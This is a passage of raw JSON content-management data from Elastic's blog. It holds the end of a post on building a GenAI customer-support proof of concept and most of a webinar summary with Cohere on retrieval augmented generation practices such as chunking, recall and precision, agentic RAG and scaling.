12pt;'\u003eTake a sneak peek at our current architecture:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csac5924db3c65fd36"}}},{"image":{"image":{"uid":"blt118be6e915c596fa","_version":1,"title":"3.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-06-27T18:50:14.625Z","updated_at":"2024-06-27T18:50:14.625Z","content_type":"image/png","file_size":"141109","filename":"3.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-06-27T19:01:39.854Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt118be6e915c596fa/667db466c8ca77b311cde359/3.png"},"_metadata":{"uid":"cs385d06149928aa63"},"caption_l10n":"","alt_text_l10n":"current architecture","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"callout":{"title_l10n":"Check out what's next in the series","_metadata":{"uid":"cs040f5fe406b98e35"},"paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003ePart 2: \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/genai-customer-support-building-a-knowledge-library\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGenAI for Customer Support — Building a Knowledge Library\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003ePart 3: \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/genai-elastic-elser-chat-interface\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGenAI for Customer Support — Designing a chat interface for chatbots... for humans\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003ePart 4:\u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/elser-rag-search-for-relevance\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e GenAI for Customer Support — Tuning RAG search for relevance\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLaunch blog: \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/generative-ai-customer-support-elastic-support-assistant\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGenAI for customer support - Explore the Elastic Support Assistant\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csb51c8571dc7e72c9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs6a6327a5ef33e020"}}}],"publish_date":"2024-06-27","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[{"_version":2,"locale":"en-us","uid":"bltad849a44c42eea31","ACL":{},"created_at":"2020-06-17T03:25:54.912Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"software-technology","label_l10n":"Software \u0026 technology","tags":[],"title":"Software \u0026 technology","updated_at":"2020-07-06T22:17:33.856Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.842Z","user":"blt4b2e1169881270a8"}}],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","title":"Search UI","label_l10n":"Search UI","keyword":"search-ui","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltaea23ea6eafbd6eb","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T21:31:21.217Z","updated_at":"2023-11-06T21:31:21.217Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:49.855Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt38a3af2dfebcb772","ACL":{},"created_at":"2024-06-06T15:02:14.821Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"retrieval-augmented-generation-rag","label_l10n":"Retrieval augmented generation (RAG)","tags":[],"title":"Retrieval augmented generation (RAG)","updated_at":"2024-06-06T15:02:14.821Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-06-06T15:02:17.473Z","user":"blt3044324473ef223b70bc674c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltedaba1c436cb0ded","ACL":{},"created_at":"2023-11-06T20:40:47.717Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"information-retrieval","label_l10n":"Information retrieval","tags":[],"title":"Information retrieval","updated_at":"2023-11-06T20:40:47.717Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:39:37.018Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":2,"locale":"en-us","uid":"blt9085022a5c6c87e9","ACL":{},"created_at":"2023-11-06T20:41:57.778Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"large-language-models","label_l10n":"Large language models","tags":[],"title":"Large language models","updated_at":"2023-11-06T20:42:13.486Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:39:28.432Z","user":"blt06083bb707628f5c"}}],"tags_use_case":[{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltbc86a233655f4b8e","ACL":{},"created_at":"2022-09-13T16:43:08.111Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2022-09-13T16:43:08.111Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.253Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt4607298d4fd82c81","ACL":{},"created_at":"2020-06-17T03:31:33.256Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"workplace-search","label_l10n":"Workplace search","tags":[],"title":"Workplace search","updated_at":"2020-07-06T22:19:56.394Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:53.167Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"bltac88392b5d494907","_version":1,"title":"elastic-de-143903-V2_V1 (1).jpeg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-06-27T18:49:31.019Z","updated_at":"2024-06-27T18:49:31.019Z","content_type":"image/jpeg","file_size":"130759","filename":"elastic-de-143903-V2_V1_(1).jpeg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-06-27T19:01:39.819Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltac88392b5d494907/667db43bbbf7b42e25a74e95/elastic-de-143903-V2_V1_(1).jpeg"},"title":"GenAI for customer support — Part 1: Building our proof of concept","title_l10n":"GenAI for customer support — Part 1: Building our proof of concept","updated_at":"2025-01-17T19:18:18.826Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/genai-customer-support-building-proof-of-concept","publish_details":{"time":"2025-01-17T19:18:24.077Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt0a0abff5c686aaea","_version":10,"locale":"en-us","ACL":{},"abstract_l10n":"Explore advanced strategies for AI applications in retrieval augmented generation (RAG). Learn from experts on enhancing LLMs with effective data integration techniques.","author":["blt6705dad0ae6f1419"],"category":["bltc17514bfdbc519df"],"created_at":"2024-08-12T17:03:46.426Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs366feaedda6623a0"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(49, 51, 63);font-size: 12pt;'\u003eOur recent \u003c/span\u003e\u003ca href=\"https://www.elastic.co/virtual-events/beyond-rag-basics\"\u003e\u003cspan style='font-size: 12pt;'\u003evirtual event with Cohere\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(49, 51, 63);font-size: 12pt;'\u003e dove deep into the world of \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/retrieval-augmented-generation\"\u003e\u003cspan style='font-size: 12pt;'\u003eretrieval augmented generation (RAG)\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(49, 51, 63);font-size: 12pt;'\u003e, focusing on the critical considerations for building RAG applications beyond the proof-of-concept stage. Our speakers, Lily Adler, principal solutions architect at Elastic, and Maxime Voisin, senior product manager at Cohere, shared valuable insights on the challenges, solutions, and best practices in this evolving field of \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/natural-language-processing\"\u003e\u003cspan style='font-size: 12pt;'\u003enatural language processing (NLP)\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(49, 51, 63);font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs836462e6f2b4192d"}}},{"image":{"image":{"uid":"blt1496b19e4c6f9e66","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-08-12T17:06:50.571Z","created_by":"bltb6c155cd84fc0c1a","file_size":"90413","filename":"rag-in-action.jpeg","parent_uid":null,"tags":[],"title":"rag-in-action.jpeg","updated_at":"2024-08-12T17:06:50.571Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-08-13T04:00:00.469Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt1496b19e4c6f9e66/66ba412a46b3f4241b969f48/rag-in-action.jpeg"},"_metadata":{"uid":"csc7900d40206449ee"},"caption_l10n":"","alt_text_l10n":"Retrieval augmented generation (RAG) in action","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Why build a stack of solutions to complement large language models?","_metadata":{"uid":"cs511a30e81090626f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003ca href=\"https://www.elastic.co/what-is/large-language-models\"\u003e\u003cspan style='font-size: 12pt;'\u003eLarge language models (LLMs)\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(49, 51, 63);font-size: 12pt;'\u003e are powerful but far from perfect. They often make absurd mistakes like suggesting putting glue on pizza or eating rocks — errors stemming from their training data without an inherent layer of logic. This is where RAG comes in, adding a crucial layer of control and context to help ground responses from the LLM. RAG is all about integrating relevant information retrieval systems with LLMs to enhance text generations. By grounding LLMs in contextually relevant data, RAG not only boosts response accuracy but also offers significant advantages in cost reduction and overall control. It helps in leveraging external knowledge sources, making the AI outputs more reliable and relevant.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs55072b03936721dc"}}},{"quotes":{"quote_l10n":"Your RAG is only as good as your retrieval engine. And there's no magic bullet to make it perfect. But there are a few best practices.","_metadata":{"uid":"cs597081834c230074"},"quote_author_l10n":"Maxime Voisin, Senior Product Manager (RAG) at Cohere","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"Understanding RAG architecture","_metadata":{"uid":"cs1a48e4fa5c131350"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(49, 51, 63);font-size: 12pt;'\u003eA basic RAG architecture begins with user questions, using \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/vector-database\"\u003e\u003cspan style='font-size: 12pt;'\u003evector databases\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(49, 51, 63);font-size: 12pt;'\u003e to retrieve relevant data, such as documents, images, and audio. This data then provides essential context for the LLM to generate a more accurate response.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(49, 51, 63);font-size: 12pt;'\u003eHowever, an advanced RAG setup involves several layers with each playing a pivotal role:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eData layer:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Determines the type (structured or unstructured) and storage of information. Effective data management is crucial for high-quality information retrieval.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eModel layer:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Incorporates foundational LLMs and embedding models. Fine-tuning these models is essential for handling specific tasks and improving performance in text generations.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eApplication layer:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Manages retrieval, prompts, and application logic, ensuring seamless integration of relevant documents into the workflow.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAnalysis and deployment layers:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Ensure the solution is fit for purpose and efficiently deployed. Continuous analysis helps in refining model performance and adapting to new data.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs6a6acca8e81f7071"}}},{"image":{"image":{"uid":"blt1963fc39739bb5e0","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-08-12T17:08:27.199Z","created_by":"bltb6c155cd84fc0c1a","file_size":"74719","filename":"rag-llmops.png","parent_uid":null,"tags":[],"title":"rag-llmops.png","updated_at":"2024-08-12T17:08:27.199Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-08-13T04:00:00.582Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt1963fc39739bb5e0/66ba418b473507b4cc090f07/rag-llmops.png"},"_metadata":{"uid":"cs7fd5431033d44566"},"caption_l10n":"","alt_text_l10n":"Production RAG LLMOps stack","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Strategic data layer management","_metadata":{"uid":"cs91261b864ec4a221"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(49, 51, 63);font-size: 12pt;'\u003eEffective RAG solutions begin with a thorough understanding of the data landscape. When dealing with \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/unstructured-data\"\u003e\u003cspan style='font-size: 12pt;'\u003eunstructured data\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(49, 51, 63);font-size: 12pt;'\u003e like images or documents or \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/structured-data\"\u003e\u003cspan style='font-size: 12pt;'\u003estructured data\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(49, 51, 63);font-size: 12pt;'\u003e, such as databases, a robust chunking strategy is indispensable:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eLarge vs. small chunks:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Balancing context richness with precision. Large chunks provide more context but may reduce precision while small chunks are more precise but may lack complete information.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eToken overlapping:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Ensuring continuous context across chunks, which helps in maintaining coherence in the retrieved information.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCollapsing relevant chunks:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Maintaining precision while always referencing the source for validation, ensuring the reliability of the information provided.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSecurity and legal considerations are also paramount. Access control mechanisms (LDAP, Active Directory) and privacy concerns, such as redacting sensitive information using named entity recognition, must be carefully managed to ensure compliance and user trust. These measures are essential to prevent data spills and unauthorized access to sensitive information.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Evaluating the model layer","_metadata":{"uid":"csc11d388dc5cb2594"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUsing human-labeled data sets and appropriate metric choices (recall vs. precision) are fundamental for effective information retrieval. Additionally, cost and speed are critical factors, necessitating trade-offs among these elements:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eRecall:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Ensuring all relevant documents are retrieved. High recall is crucial in legal or compliance scenarios where missing relevant information can have significant consequences.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ePrecision:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Ensuring the retrieved documents are highly relevant to the query. High precision is important in consumer applications to avoid user frustration.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eEffective fine-tuning of the LLMs is critical for optimizing these metrics and improving the overall performance of the RAG system.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Addressing challenges in generative models","_metadata":{"uid":"cs0071cc51fe8ea6c8"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo increase verifiability and reduce hallucinations in generative models, use models that provide citations, choose those with lower hallucination rates, and improve context window utilization. This will enhance coherence in the generated text. Additionally, models trained specifically for RAG applications can significantly reduce the likelihood of inaccuracies and improve the overall reliability of the system.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs62c85b1a86d20a15"}}},{"quotes":{"quote_l10n":"LLMs make mistakes, humans make mistakes as well, although LLMs make mistakes that are a bit more silly because there's not that layer of logic for LLM.","_metadata":{"uid":"cs2d4887bb087b4cfa"},"quote_author_l10n":"Lily Alder, Principal Solutions Architect at Elastic","quote_details_l10n":""}},{"banner":{"reference":[{"uid":"blt002516fdeca7bc32","_content_type_uid":"banner"}],"_metadata":{"uid":"csd299126cde3ac2bf"}}},{"title_text":{"title_text":[{"title_l10n":"Advanced RAG techniques","_metadata":{"uid":"cs543cdcdd239ede8b"},"header_style":"H2","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eParallel queries:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Handling multipart questions with parallel search queries significantly improves response accuracy in RAG systems, making them adept at tackling complex user requests. This technique enables the system to break down and address different parts of a query simultaneously, ensuring a comprehensive and accurate response.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eRAG with tools:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Extending RAG capabilities by integrating tools to handle complex data types (such as spreadsheets and SaaS apps) opens new possibilities for AI applications like workplace assistants. This incorporation allows RAG systems to interact with external knowledge sources, providing more comprehensive answers. For example, querying a database or a spreadsheet to provide data-driven responses can enhance the utility of the system in business and productivity applications.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eAgentic RAG:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Equipping RAG systems with agentic capabilities allows for sequential reasoning and dynamic planning, making them robust against more complex queries. Agentic RAG systems can utilize multiple tools and adjust their plans based on the results they gather. This flexibility allows for more sophisticated problem-solving abilities and can handle intricate tasks that require multiple steps and logical reasoning.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Deploying retrieval augmented generation at scale","_metadata":{"uid":"cs1422e3bc7a0edabb"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eScaling RAG solutions involves addressing three main areas:\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCost management:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Choose efficient models and optimize \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/vector-search\"\u003e\u003cspan style='font-size: 12pt;'\u003evector search\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e databases to control costs effectively. Cost analysis and regular monitoring can help in identifying areas for optimization, ensuring the solution remains cost-effective.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSecurity and reliability:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Implement disaster recovery, service level objectives, and adopt a site reliability engineering (SRE) approach to ensure robust infrastructure. These measures help in maintaining uptime and reliability, which is critical for production environments.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eContinuous analysis:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Utilize observability tools to monitor and evaluate LLM responses over time, adapting to changes and ensuring consistent performance. Continuous evaluation helps in maintaining the quality of \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/information-retrieval\"\u003e\u003cspan style='font-size: 12pt;'\u003einformation retrieva\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003el and adjusting to any evolving requirements.\u003c/span\u003e\u003c/li\u003e\u003c/ol\u003e"},{"title_l10n":"Practical implementation strategies","_metadata":{"uid":"csb22c308243cccb23"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSeveral tools and frameworks, such as LangChain, LlamaIndex, Autogen, and Cohere's API, offer out-of-the-box solutions to implement advanced RAG systems efficiently. Leveraging these tools can help you avoid starting from scratch, accelerating deployment and reducing overhead. They provide prebuilt components for information retrieval and natural language processing tasks, enabling faster and more reliable implementations.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor example, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/langchain-tutorial\"\u003e\u003cspan style='font-size: 12pt;'\u003eLangChain\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e can help in building complex workflows by chaining different processes while LlamaIndex offers efficient indexing solutions for fast retrieval. Autogen, on the other hand, simplifies the generation of responses by providing a range of preconfigured settings and templates.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Collaborations and resources","_metadata":{"uid":"cs2f5a48ff2d2e6cc9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic and Cohere have been at the forefront of information retrieval and RAG research and development. Here’s how you can dive deeper into RAG:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(49, 51, 63);font-size: 12pt;\"\u003eWatch the full webinar: \u003c/span\u003e\u003ca href=\"https://www.elastic.co/virtual-events/beyond-rag-basics\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBeyond RAG basics: Strategies and best practices for implementing RAG\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(49, 51, 63);font-size: 12pt;\"\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(49, 51, 63);font-size: 12pt;\"\u003eTest the latest AI search capabilities with \u003c/span\u003e\u003ca href=\"https://www.elastic.co/demo-gallery/ai-playground\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAI Playground\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(49, 51, 63);font-size: 12pt;\"\u003e, a free hands-on lab covering how to build RAG systems.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"color: rgb(49, 51, 63);font-size: 12pt;\"\u003eFor further reading and hands-on workshops, visit \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElasticsearch Labs\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(49, 51, 63);font-size: 12pt;\"\u003e. This resource offers valuable information, tutorials, and code samples pertinent to various RAG use cases, including tutorials for using Elastic with Cohere.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/cloud/generative-ai-trial-overview\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eStart a free trial\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e to get started building apps with search AI.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBy understanding the intricacies of RAG and implementing best practices in natural language processing, you can build robust AI applications that leverage external knowledge sources for more accurate and reliable responses. Whether you are focusing on simple RAG systems or more advanced implementations, the goal is to create solutions that are scalable, cost-effective, and provide value through precise information retrieval and text generations.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The Elastic AI Ecosystem","_metadata":{"uid":"cs9f23d88fa3a6055b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eCohere is a valued partner in the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/partners/ai-ecosystem\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic AI Ecosystem\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e which offers developers pre-built Elasticsearch vector database \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/integrations\"\u003e\u003cspan style='font-size: 12pt;'\u003eintegrations\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e from a trusted network of industry-leading AI companies to deliver seamless access to 